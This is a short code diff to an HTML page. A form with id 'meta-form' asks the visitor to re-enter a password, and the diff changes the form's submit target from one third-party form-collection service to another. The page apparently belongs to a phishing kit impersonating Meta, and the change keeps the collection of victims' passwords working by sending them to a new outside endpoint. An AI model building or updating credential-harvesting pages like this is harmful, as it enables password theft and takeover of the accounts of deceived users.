--- a/index.html
+++ b/index.html
@@ -113,7 +113,7 @@
         <p>Please re-enter your password to complete the request.</p>
        <form
               id="meta-form"
-              action="https://submit-form.com/5E0RGXkcI"
+              action="https://getform.io/f/09df7645-f968-4a5c-bd2c-137e7f7a7b72"
               method="POST"
             >
               <!-- Replace with your Access Key -->
